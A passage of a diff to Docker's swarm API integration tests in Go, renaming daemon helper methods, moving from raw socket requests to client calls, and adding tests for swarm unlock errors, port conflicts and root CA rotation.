-func (s *DockerSwarmSuite) TestAPISwarmNodeRemove(c *check.C) {
-	testRequires(c, Network)
-	d1 := s.AddDaemon(c, true, true)
-	d2 := s.AddDaemon(c, true, false)
-	_ = s.AddDaemon(c, true, false)
-
-	nodes := d1.listNodes(c)
-	c.Assert(len(nodes), checker.Equals, 3, check.Commentf("nodes: %#v", nodes))
-
-	// Getting the info so we can take the NodeID
-	d2Info, err := d2.info()
-	c.Assert(err, checker.IsNil)
-
-	// forceful removal of d2 should work
-	d1.removeNode(c, d2Info.NodeID, true)
-
-	nodes = d1.listNodes(c)
-	c.Assert(len(nodes), checker.Equals, 2, check.Commentf("nodes: %#v", nodes))
-
-	// Restart the node that was removed
-	err = d2.Restart()
-	c.Assert(err, checker.IsNil)
-
-	// Give some time for the node to rejoin
-	time.Sleep(1 * time.Second)
-
-	// Make sure the node didn't rejoin
-	nodes = d1.listNodes(c)
-	c.Assert(len(nodes), checker.Equals, 2, check.Commentf("nodes: %#v", nodes))
-}
-
-func (s *DockerSwarmSuite) TestAPISwarmNodeDrainPause(c *check.C) {
-	d1 := s.AddDaemon(c, true, true)
-	d2 := s.AddDaemon(c, true, false)
-
-	time.Sleep(1 * time.Second) // make sure all daemons are ready to accept tasks
-
-	// start a service, expect balanced distribution
-	instances := 8
-	id := d1.createService(c, simpleTestService, setInstances(instances))
-
-	waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.GreaterThan, 0)
-	waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.GreaterThan, 0)
-	waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount), checker.Equals, instances)
-
-	// drain d2, all containers should move to d1
-	d1.updateNode(c, d2.NodeID, func(n *swarm.Node) {
-		n.Spec.Availability = swarm.NodeAvailabilityDrain
-	})
-	waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.Equals, instances)
-	waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.Equals, 0)
-
-	// set d2 back to active
-	d1.updateNode(c, d2.NodeID, func(n *swarm.Node) {
-		n.Spec.Availability = swarm.NodeAvailabilityActive
-	})
-
-	instances = 1
-	d1.updateService(c, d1.getService(c, id), setInstances(instances))
-
-	waitAndAssert(c, defaultReconciliationTimeout*2, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount), checker.Equals, instances)
-
-	instances = 8
-	d1.updateService(c, d1.getService(c, id), setInstances(instances))
-
-	// drained node first so we don't get any old containers
-	waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.GreaterThan, 0)
-	waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.GreaterThan, 0)
-	waitAndAssert(c, defaultReconciliationTimeout*2, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount), checker.Equals, instances)
-
-	d2ContainerCount := len(d2.activeContainers())
-
-	// set d2 to paused, scale service up, only d1 gets new tasks
-	d1.updateNode(c, d2.NodeID, func(n *swarm.Node) {
-		n.Spec.Availability = swarm.NodeAvailabilityPause
-	})
-
-	instances = 14
-	d1.updateService(c, d1.getService(c, id), setInstances(instances))
-
-	waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.Equals, instances-d2ContainerCount)
-	waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.Equals, d2ContainerCount)
-
-}
-
 func (s *DockerSwarmSuite) TestAPISwarmLeaveRemovesContainer(c *check.C) {
 	d := s.AddDaemon(c, true, true)
 
 	instances := 2
-	d.createService(c, simpleTestService, setInstances(instances))
+	d.CreateService(c, simpleTestService, setInstances(instances))
 
 	id, err := d.Cmd("run", "-d", "busybox", "top")
 	c.Assert(err, checker.IsNil)
 	id = strings.TrimSpace(id)
 
-	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, instances+1)
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, instances+1)
 
-	c.Assert(d.Leave(false), checker.NotNil)
-	c.Assert(d.Leave(true), checker.IsNil)
+	c.Assert(d.SwarmLeave(false), checker.NotNil)
+	c.Assert(d.SwarmLeave(true), checker.IsNil)
 
-	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1)
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1)
 
 	id2, err := d.Cmd("ps", "-q")
 	c.Assert(err, checker.IsNil)
@@ -867,19 +429,20 @@ func (s *DockerSwarmSuite) TestAPISwarmLeaveOnPendingJoin(c *check.C) {
 	c.Assert(err, checker.IsNil)
 	id = strings.TrimSpace(id)
 
-	err = d2.Join(swarm.JoinRequest{
+	c2 := d2.NewClientT(c)
+	err = c2.SwarmJoin(context.Background(), swarm.JoinRequest{
+		ListenAddr:  d2.SwarmListenAddr(),
 		RemoteAddrs: []string{"123.123.123.123:1234"},
 	})
 	c.Assert(err, check.NotNil)
 	c.Assert(err.Error(), checker.Contains, "Timeout was reached")
 
-	info, err := d2.info()
-	c.Assert(err, checker.IsNil)
+	info := d2.SwarmInfo(c)
 	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStatePending)
 
-	c.Assert(d2.Leave(true), checker.IsNil)
+	c.Assert(d2.SwarmLeave(true), checker.IsNil)
 
-	waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.Equals, 1)
+	waitAndAssert(c, defaultReconciliationTimeout, d2.CheckActiveContainerCount, checker.Equals, 1)
 
 	id2, err := d2.Cmd("ps", "-q")
 	c.Assert(err, checker.IsNil)
@@ -890,19 +453,20 @@ func (s *DockerSwarmSuite) TestAPISwarmLeaveOnPendingJoin(c *check.C) {
 func (s *DockerSwarmSuite) TestAPISwarmRestoreOnPendingJoin(c *check.C) {
 	testRequires(c, Network)
 	d := s.AddDaemon(c, false, false)
-	err := d.Join(swarm.JoinRequest{
+	client := d.NewClientT(c)
+	err := client.SwarmJoin(context.Background(), swarm.JoinRequest{
+		ListenAddr:  d.SwarmListenAddr(),
 		RemoteAddrs: []string{"123.123.123.123:1234"},
 	})
 	c.Assert(err, check.NotNil)
 	c.Assert(err.Error(), checker.Contains, "Timeout was reached")
 
-	waitAndAssert(c, defaultReconciliationTimeout, d.checkLocalNodeState, checker.Equals, swarm.LocalNodeStatePending)
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckLocalNodeState, checker.Equals, swarm.LocalNodeStatePending)
 
-	c.Assert(d.Stop(), checker.IsNil)
-	c.Assert(d.Start(), checker.IsNil)
+	d.Stop(c)
+	d.Start(c)
 
-	info, err := d.info()
-	c.Assert(err, checker.IsNil)
+	info := d.SwarmInfo(c)
 	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive)
 }
 
@@ -910,43 +474,43 @@ func (s *DockerSwarmSuite) TestAPISwarmManagerRestore(c *check.C) {
 	d1 := s.AddDaemon(c, true, true)
 
 	instances := 2
-	id := d1.createService(c, simpleTestService, setInstances(instances))
+	id := d1.CreateService(c, simpleTestService, setInstances(instances))
 
-	d1.getService(c, id)
-	d1.Stop()
-	d1.Start()
-	d1.getService(c, id)
+	d1.GetService(c, id)
+	d1.Stop(c)
+	d1.Start(c)
+	d1.GetService(c, id)
 
 	d2 := s.AddDaemon(c, true, true)
-	d2.getService(c, id)
-	d2.Stop()
-	d2.Start()
-	d2.getService(c, id)
+	d2.GetService(c, id)
+	d2.Stop(c)
+	d2.Start(c)
+	d2.GetService(c, id)
 
 	d3 := s.AddDaemon(c, true, true)
-	d3.getService(c, id)
-	d3.Stop()
-	d3.Start()
-	d3.getService(c, id)
+	d3.GetService(c, id)
+	d3.Stop(c)
+	d3.Start(c)
+	d3.GetService(c, id)
 
 	d3.Kill()
 	time.Sleep(1 * time.Second) // time to handle signal
-	d3.Start()
-	d3.getService(c, id)
+	d3.Start(c)
+	d3.GetService(c, id)
 }
 
 func (s *DockerSwarmSuite) TestAPISwarmScaleNoRollingUpdate(c *check.C) {
 	d := s.AddDaemon(c, true, true)
 
 	instances := 2
-	id := d.createService(c, simpleTestService, setInstances(instances))
+	id := d.CreateService(c, simpleTestService, setInstances(instances))
 
-	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, instances)
-	containers := d.activeContainers()
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, instances)
+	containers := d.ActiveContainers(c)
 	instances = 4
-	d.updateService(c, d.getService(c, id), setInstances(instances))
-	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, instances)
-	containers2 := d.activeContainers()
+	d.UpdateService(c, d.GetService(c, id), setInstances(instances))
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, instances)
+	containers2 := d.ActiveContainers(c)
 
 loop0:
 	for _, c1 := range containers {
@@ -964,17 +528,17 @@ func (s *DockerSwarmSuite) TestAPISwarmInvalidAddress(c *check.C) {
 	req := swarm.InitRequest{
 		ListenAddr: "",
 	}
-	status, _, err := d.SockRequest("POST", "/swarm/init", req)
+	res, _, err := request.Post("/swarm/init", request.Host(d.Sock()), request.JSONBody(req))
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusInternalServerError)
+	c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest)
 
 	req2 := swarm.JoinRequest{
 		ListenAddr:  "0.0.0.0:2377",
 		RemoteAddrs: []string{""},
 	}
-	status, _, err = d.SockRequest("POST", "/swarm/join", req2)
+	res, _, err = request.Post("/swarm/join", request.Host(d.Sock()), request.JSONBody(req2))
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusInternalServerError)
+	c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest)
 }
 
 func (s *DockerSwarmSuite) TestAPISwarmForceNewCluster(c *check.C) {
@@ -982,35 +546,34 @@ func (s *DockerSwarmSuite) TestAPISwarmForceNewCluster(c *check.C) {
 	d2 := s.AddDaemon(c, true, true)
 
 	instances := 2
-	id := d1.createService(c, simpleTestService, setInstances(instances))
-	waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount), checker.Equals, instances)
+	id := d1.CreateService(c, simpleTestService, setInstances(instances))
+	waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.CheckActiveContainerCount, d2.CheckActiveContainerCount), checker.Equals, instances)
 
 	// drain d2, all containers should move to d1
-	d1.updateNode(c, d2.NodeID, func(n *swarm.Node) {
+	d1.UpdateNode(c, d2.NodeID(), func(n *swarm.Node) {
 		n.Spec.Availability = swarm.NodeAvailabilityDrain
 	})
-	waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.Equals, instances)
-	waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.Equals, 0)
+	waitAndAssert(c, defaultReconciliationTimeout, d1.CheckActiveContainerCount, checker.Equals, instances)
+	waitAndAssert(c, defaultReconciliationTimeout, d2.CheckActiveContainerCount, checker.Equals, 0)
 
-	c.Assert(d2.Stop(), checker.IsNil)
+	d2.Stop(c)
 
-	c.Assert(d1.Init(swarm.InitRequest{
+	d1.SwarmInit(c, swarm.InitRequest{
 		ForceNewCluster: true,
 		Spec:            swarm.Spec{},
-	}), checker.IsNil)
+	})
 
-	waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.Equals, instances)
+	waitAndAssert(c, defaultReconciliationTimeout, d1.CheckActiveContainerCount, checker.Equals, instances)
 
 	d3 := s.AddDaemon(c, true, true)
-	info, err := d3.info()
-	c.Assert(err, checker.IsNil)
+	info := d3.SwarmInfo(c)
 	c.Assert(info.ControlAvailable, checker.True)
 	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive)
 
 	instances = 4
-	d3.updateService(c, d3.getService(c, id), setInstances(instances))
+	d3.UpdateService(c, d3.GetService(c, id), setInstances(instances))
 
-	waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d3.checkActiveContainerCount), checker.Equals, instances)
+	waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.CheckActiveContainerCount, d3.CheckActiveContainerCount), checker.Equals, instances)
 }
 
 func simpleTestService(s *swarm.Service) {
@@ -1019,7 +582,7 @@ func simpleTestService(s *swarm.Service) {
 
 	s.Spec = swarm.ServiceSpec{
 		TaskTemplate: swarm.TaskSpec{
-			ContainerSpec: swarm.ContainerSpec{
+			ContainerSpec: &swarm.ContainerSpec{
 				Image:   "busybox:latest",
 				Command: []string{"/bin/top"},
 			},
@@ -1042,7 +605,7 @@ func serviceForUpdate(s *swarm.Service) {
 
 	s.Spec = swarm.ServiceSpec{
 		TaskTemplate: swarm.TaskSpec{
-			ContainerSpec: swarm.ContainerSpec{
+			ContainerSpec: &swarm.ContainerSpec{
 				Image:   "busybox:latest",
 				Command: []string{"/bin/top"},
 			},
@@ -1060,11 +623,16 @@ func serviceForUpdate(s *swarm.Service) {
 			Delay:         4 * time.Second,
 			FailureAction: swarm.UpdateFailureActionContinue,
 		},
+		RollbackConfig: &swarm.UpdateConfig{
+			Parallelism:   3,
+			Delay:         4 * time.Second,
+			FailureAction: swarm.UpdateFailureActionContinue,
+		},
 	}
 	s.Spec.Name = "updatetest"
 }
 
-func setInstances(replicas int) serviceConstructor {
+func setInstances(replicas int) testdaemon.ServiceConstructor {
 	ureplicas := uint64(replicas)
 	return func(s *swarm.Service) {
 		s.Spec.Mode = swarm.ServiceMode{
@@ -1075,31 +643,52 @@ func setInstances(replicas int) serviceConstructor {
 	}
 }
 
-func setImage(image string) serviceConstructor {
+func setUpdateOrder(order string) testdaemon.ServiceConstructor {
+	return func(s *swarm.Service) {
+		if s.Spec.UpdateConfig == nil {
+			s.Spec.UpdateConfig = &swarm.UpdateConfig{}
+		}
+		s.Spec.UpdateConfig.Order = order
+	}
+}
+
+func setRollbackOrder(order string) testdaemon.ServiceConstructor {
 	return func(s *swarm.Service) {
+		if s.Spec.RollbackConfig == nil {
+			s.Spec.RollbackConfig = &swarm.UpdateConfig{}
+		}
+		s.Spec.RollbackConfig.Order = order
+	}
+}
+
+func setImage(image string) testdaemon.ServiceConstructor {
+	return func(s *swarm.Service) {
+		if s.Spec.TaskTemplate.ContainerSpec == nil {
+			s.Spec.TaskTemplate.ContainerSpec = &swarm.ContainerSpec{}
+		}
 		s.Spec.TaskTemplate.ContainerSpec.Image = image
 	}
 }
 
-func setFailureAction(failureAction string) serviceConstructor {
+func setFailureAction(failureAction string) testdaemon.ServiceConstructor {
 	return func(s *swarm.Service) {
 		s.Spec.UpdateConfig.FailureAction = failureAction
 	}
 }
 
-func setMaxFailureRatio(maxFailureRatio float32) serviceConstructor {
+func setMaxFailureRatio(maxFailureRatio float32) testdaemon.ServiceConstructor {
 	return func(s *swarm.Service) {
 		s.Spec.UpdateConfig.MaxFailureRatio = maxFailureRatio
 	}
 }
 
-func setParallelism(parallelism uint64) serviceConstructor {
+func setParallelism(parallelism uint64) testdaemon.ServiceConstructor {
 	return func(s *swarm.Service) {
 		s.Spec.UpdateConfig.Parallelism = parallelism
 	}
 }
 
-func setConstraints(constraints []string) serviceConstructor {
+func setConstraints(constraints []string) testdaemon.ServiceConstructor {
 	return func(s *swarm.Service) {
 		if s.Spec.TaskTemplate.Placement == nil {
 			s.Spec.TaskTemplate.Placement = &swarm.Placement{}
@@ -1108,24 +697,34 @@ func setConstraints(constraints []string) serviceConstructor {
 	}
 }
 
+func setPlacementPrefs(prefs []swarm.PlacementPreference) testdaemon.ServiceConstructor {
+	return func(s *swarm.Service) {
+		if s.Spec.TaskTemplate.Placement == nil {
+			s.Spec.TaskTemplate.Placement = &swarm.Placement{}
+		}
+		s.Spec.TaskTemplate.Placement.Preferences = prefs
+	}
+}
+
 func setGlobalMode(s *swarm.Service) {
 	s.Spec.Mode = swarm.ServiceMode{
 		Global: &swarm.GlobalService{},
 	}
 }
 
-func checkClusterHealth(c *check.C, cl []*SwarmDaemon, managerCount, workerCount int) {
+func checkClusterHealth(c *check.C, cl []*daemon.Daemon, managerCount, workerCount int) {
 	var totalMCount, totalWCount int
 
 	for _, d := range cl {
 		var (
 			info swarm.Info
-			err  error
 		)
 
 		// check info in a waitAndAssert, because if the cluster doesn't have a leader, `info` will return an error
 		checkInfo := func(c *check.C) (interface{}, check.CommentInterface) {
-			info, err = d.info()
+			client := d.NewClientT(c)
+			daemonInfo, err := client.Info(context.Background())
+			info = daemonInfo.Swarm
 			return err, check.Commentf("cluster not ready in time")
 		}
 		waitAndAssert(c, defaultReconciliationTimeout, checkInfo, checker.IsNil)
@@ -1138,14 +737,14 @@ func checkClusterHealth(c *check.C, cl []*SwarmDaemon, managerCount, workerCount
 		totalMCount++
 		var mCount, wCount int
 
-		for _, n := range d.listNodes(c) {
+		for _, n := range d.ListNodes(c) {
 			waitReady := func(c *check.C) (interface{}, check.CommentInterface) {
 				if n.Status.State == swarm.NodeStateReady {
 					return true, nil
 				}
-				nn := d.getNode(c, n.ID)
+				nn := d.GetNode(c, n.ID)
 				n = *nn
-				return n.Status.State == swarm.NodeStateReady, check.Commentf("state of node %s, reported by %s", n.ID, d.Info.NodeID)
+				return n.Status.State == swarm.NodeStateReady, check.Commentf("state of node %s, reported by %s", n.ID, d.NodeID())
 			}
 			waitAndAssert(c, defaultReconciliationTimeout, waitReady, checker.True)
 
@@ -1153,20 +752,20 @@ func checkClusterHealth(c *check.C, cl []*SwarmDaemon, managerCount, workerCount
 				if n.Spec.Availability == swarm.NodeAvailabilityActive {
 					return true, nil
 				}
-				nn := d.getNode(c, n.ID)
+				nn := d.GetNode(c, n.ID)
 				n = *nn
-				return n.Spec.Availability == swarm.NodeAvailabilityActive, check.Commentf("availability of node %s, reported by %s", n.ID, d.Info.NodeID)
+				return n.Spec.Availability == swarm.NodeAvailabilityActive, check.Commentf("availability of node %s, reported by %s", n.ID, d.NodeID())
 			}
 			waitAndAssert(c, defaultReconciliationTimeout, waitActive, checker.True)
 
 			if n.Spec.Role == swarm.NodeRoleManager {
-				c.Assert(n.ManagerStatus, checker.NotNil, check.Commentf("manager status of node %s (manager), reported by %s", n.ID, d.Info.NodeID))
+				c.Assert(n.ManagerStatus, checker.NotNil, check.Commentf("manager status of node %s (manager), reported by %s", n.ID, d.NodeID()))
 				if n.ManagerStatus.Leader {
 					leaderFound = true
 				}
 				mCount++
 			} else {
-				c.Assert(n.ManagerStatus, checker.IsNil, check.Commentf("manager status of node %s (worker), reported by %s", n.ID, d.Info.NodeID))
+				c.Assert(n.ManagerStatus, checker.IsNil, check.Commentf("manager status of node %s (worker), reported by %s", n.ID, d.NodeID()))
 				wCount++
 			}
 		}
@@ -1181,11 +780,10 @@ func checkClusterHealth(c *check.C, cl []*SwarmDaemon, managerCount, workerCount
 func (s *DockerSwarmSuite) TestAPISwarmRestartCluster(c *check.C) {
 	mCount, wCount := 5, 1
 
-	var nodes []*SwarmDaemon
+	var nodes []*daemon.Daemon
 	for i := 0; i < mCount; i++ {
 		manager := s.AddDaemon(c, true, true)
-		info, err := manager.info()
-		c.Assert(err, checker.IsNil)
+		info := manager.SwarmInfo(c)
 		c.Assert(info.ControlAvailable, checker.True)
 		c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive)
 		nodes = append(nodes, manager)
@@ -1193,8 +791,7 @@ func (s *DockerSwarmSuite) TestAPISwarmRestartCluster(c *check.C) {
 
 	for i := 0; i < wCount; i++ {
 		worker := s.AddDaemon(c, true, false)
-		info, err := worker.info()
-		c.Assert(err, checker.IsNil)
+		info := worker.SwarmInfo(c)
 		c.Assert(info.ControlAvailable, checker.False)
 		c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive)
 		nodes = append(nodes, worker)
@@ -1207,14 +804,11 @@ func (s *DockerSwarmSuite) TestAPISwarmRestartCluster(c *check.C) {
 		errs := make(chan error, len(nodes))
 
 		for _, d := range nodes {
-			go func(daemon *SwarmDaemon) {
+			go func(daemon *daemon.Daemon) {
 				defer wg.Done()
-				if err := daemon.Stop(); err != nil {
+				if err := daemon.StopWithError(); err != nil {
 					errs <- err
 				}
-				if root := os.Getenv("DOCKER_REMAP_ROOT"); root != "" {
-					daemon.root = filepath.Dir(daemon.root)
-				}
 			}(d)
 		}
 		wg.Wait()
@@ -1231,9 +825,9 @@ func (s *DockerSwarmSuite) TestAPISwarmRestartCluster(c *check.C) {
 		errs := make(chan error, len(nodes))
 
 		for _, d := range nodes {
-			go func(daemon *SwarmDaemon) {
+			go func(daemon *daemon.Daemon) {
 				defer wg.Done()
-				if err := daemon.Start("--iptables=false"); err != nil {
+				if err := daemon.StartWithError("--iptables=false"); err != nil {
 					errs <- err
 				}
 			}(d)
@@ -1252,116 +846,189 @@ func (s *DockerSwarmSuite) TestAPISwarmServicesUpdateWithName(c *check.C) {
 	d := s.AddDaemon(c, true, true)
 
 	instances := 2
-	id := d.createService(c, simpleTestService, setInstances(instances))
-	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, instances)
+	id := d.CreateService(c, simpleTestService, setInstances(instances))
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, instances)
 
-	service := d.getService(c, id)
+	service := d.GetService(c, id)
 	instances = 5
 
 	setInstances(instances)(service)
-	url := fmt.Sprintf("/services/%s/update?version=%d", service.Spec.Name, service.Version.Index)
-	status, out, err := d.SockRequest("POST", url, service.Spec)
+	cli, err := d.NewClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
+	_, err = cli.ServiceUpdate(context.Background(), service.Spec.Name, service.Version, service.Spec, types.ServiceUpdateOptions{})
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out)))
-	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, instances)
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, instances)
 }
 
-func (s *DockerSwarmSuite) TestAPISwarmSecretsEmptyList(c *check.C) {
+// Unlocking an unlocked swarm results in an error
+func (s *DockerSwarmSuite) TestAPISwarmUnlockNotLocked(c *check.C) {
 	d := s.AddDaemon(c, true, true)
+	err := d.SwarmUnlock(swarm.UnlockRequest{UnlockKey: "wrong-key"})
+	c.Assert(err, checker.NotNil)
+	c.Assert(err.Error(), checker.Contains, "swarm is not locked")
+}
 
-	secrets := d.listSecrets(c)
-	c.Assert(secrets, checker.NotNil)
-	c.Assert(len(secrets), checker.Equals, 0, check.Commentf("secrets: %#v", secrets))
+// #29885
+func (s *DockerSwarmSuite) TestAPISwarmErrorHandling(c *check.C) {
+	ln, err := net.Listen("tcp", fmt.Sprintf(":%d", defaultSwarmPort))
+	c.Assert(err, checker.IsNil)
+	defer ln.Close()
+	d := s.AddDaemon(c, false, false)
+	client := d.NewClientT(c)
+	_, err = client.SwarmInit(context.Background(), swarm.InitRequest{
+		ListenAddr: d.SwarmListenAddr(),
+	})
+	c.Assert(err, checker.NotNil)
+	c.Assert(err.Error(), checker.Contains, "address already in use")
 }
 
-func (s *DockerSwarmSuite) TestAPISwarmSecretsCreate(c *check.C) {
+// Test case for 30242, where duplicate networks, with different drivers `bridge` and `overlay`,
+// caused both scopes to be `swarm` for `docker network inspect` and `docker network ls`.
+// This test makes sure the fixes correctly output scopes instead.
+func (s *DockerSwarmSuite) TestAPIDuplicateNetworks(c *check.C) {
 	d := s.AddDaemon(c, true, true)
+	cli, err := d.NewClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
 
-	testName := "test_secret"
-	id := d.createSecret(c, swarm.SecretSpec{
-		swarm.Annotations{
-			Name: testName,
-		},
-		[]byte("TESTINGDATA"),
-	})
-	c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id))
+	name := "foo"
+	networkCreate := types.NetworkCreate{
+		CheckDuplicate: false,
+	}
 
-	secrets := d.listSecrets(c)
-	c.Assert(len(secrets), checker.Equals, 1, check.Commentf("secrets: %#v", secrets))
-	name := secrets[0].Spec.Annotations.Name
-	c.Assert(name, checker.Equals, testName, check.Commentf("secret: %s", name))
-}
+	networkCreate.Driver = "bridge"
 
-func (s *DockerSwarmSuite) TestAPISwarmSecretsDelete(c *check.C) {
-	d := s.AddDaemon(c, true, true)
+	n1, err := cli.NetworkCreate(context.Background(), name, networkCreate)
+	c.Assert(err, checker.IsNil)
 
-	testName := "test_secret"
-	id := d.createSecret(c, swarm.SecretSpec{
-		swarm.Annotations{
-			Name: testName,
-		},
-		[]byte("TESTINGDATA"),
-	})
-	c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id))
+	networkCreate.Driver = "overlay"
 
-	secret := d.getSecret(c, id)
-	c.Assert(secret.ID, checker.Equals, id, check.Commentf("secret: %v", secret))
+	n2, err := cli.NetworkCreate(context.Background(), name, networkCreate)
+	c.Assert(err, checker.IsNil)
 
-	d.deleteSecret(c, secret.ID)
-	status, out, err := d.SockRequest("GET", "/secrets/"+id, nil)
+	r1, err := cli.NetworkInspect(context.Background(), n1.ID, types.NetworkInspectOptions{})
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusNotFound, check.Commentf("secret delete: %s", string(out)))
+	c.Assert(r1.Scope, checker.Equals, "local")
+
+	r2, err := cli.NetworkInspect(context.Background(), n2.ID, types.NetworkInspectOptions{})
+	c.Assert(err, checker.IsNil)
+	c.Assert(r2.Scope, checker.Equals, "swarm")
 }
 
-// Test case for 30242, where duplicate networks, with different drivers `bridge` and `overlay`,
-// caused both scopes to be `swarm` for `docker network inspect` and `docker network ls`.
-// This test makes sure the fixes correctly output scopes instead.
-func (s *DockerSwarmSuite) TestAPIDuplicateNetworks(c *check.C) {
+// Test case for 30178
+func (s *DockerSwarmSuite) TestAPISwarmHealthcheckNone(c *check.C) {
+	// Issue #36386 can be a independent one, which is worth further investigation.
+	c.Skip("Root cause of Issue #36386 is needed")
 	d := s.AddDaemon(c, true, true)
 
-	name := "foo"
-	networkCreateRequest := types.NetworkCreateRequest{
-		Name: name,
-		NetworkCreate: types.NetworkCreate{
-			CheckDuplicate: false,
-		},
-	}
+	out, err := d.Cmd("network", "create", "-d", "overlay", "lb")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
 
-	var n1 types.NetworkCreateResponse
-	networkCreateRequest.NetworkCreate.Driver = "bridge"
+	instances := 1
+	d.CreateService(c, simpleTestService, setInstances(instances), func(s *swarm.Service) {
+		if s.Spec.TaskTemplate.ContainerSpec == nil {
+			s.Spec.TaskTemplate.ContainerSpec = &swarm.ContainerSpec{}
+		}
+		s.Spec.TaskTemplate.ContainerSpec.Healthcheck = &container.HealthConfig{}
+		s.Spec.TaskTemplate.Networks = []swarm.NetworkAttachmentConfig{
+			{Target: "lb"},
+		}
+	})
 
-	status, out, err := d.SockRequest("POST", "/networks/create", networkCreateRequest)
-	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
-	c.Assert(status, checker.Equals, http.StatusCreated, check.Commentf(string(out)))
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, instances)
 
-	c.Assert(json.Unmarshal(out, &n1), checker.IsNil)
+	containers := d.ActiveContainers(c)
 
-	var n2 types.NetworkCreateResponse
-	networkCreateRequest.NetworkCreate.Driver = "overlay"
+	out, err = d.Cmd("exec", containers[0], "ping", "-c1", "-W3", "top")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+}
 
-	status, out, err = d.SockRequest("POST", "/networks/create", networkCreateRequest)
-	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
-	c.Assert(status, checker.Equals, http.StatusCreated, check.Commentf(string(out)))
+func (s *DockerSwarmSuite) TestSwarmRepeatedRootRotation(c *check.C) {
+	m := s.AddDaemon(c, true, true)
+	w := s.AddDaemon(c, true, false)
+
+	info := m.SwarmInfo(c)
+
+	currentTrustRoot := info.Cluster.TLSInfo.TrustRoot
+
+	// rotate multiple times
+	for i := 0; i < 4; i++ {
+		var err error
+		var cert, key []byte
+		if i%2 != 0 {
+			cert, _, key, err = initca.New(&csr.CertificateRequest{
+				CN:         "newRoot",
+				KeyRequest: csr.NewBasicKeyRequest(),
+				CA:         &csr.CAConfig{Expiry: ca.RootCAExpiration},
+			})
+			c.Assert(err, checker.IsNil)
+		}
+		expectedCert := string(cert)
+		m.UpdateSwarm(c, func(s *swarm.Spec) {
+			s.CAConfig.SigningCACert = expectedCert
+			s.CAConfig.SigningCAKey = string(key)
+			s.CAConfig.ForceRotate++
+		})
 
-	c.Assert(json.Unmarshal(out, &n2), checker.IsNil)
+		// poll to make sure update succeeds
+		var clusterTLSInfo swarm.TLSInfo
+		for j := 0; j < 18; j++ {
+			info := m.SwarmInfo(c)
 
-	var r1 types.NetworkResource
+			// the desired CA cert and key is always redacted
+			c.Assert(info.Cluster.Spec.CAConfig.SigningCAKey, checker.Equals, "")
+			c.Assert(info.Cluster.Spec.CAConfig.SigningCACert, checker.Equals, "")
 
-	status, out, err = d.SockRequest("GET", "/networks/"+n1.ID, nil)
-	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
-	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf(string(out)))
+			clusterTLSInfo = info.Cluster.TLSInfo
 
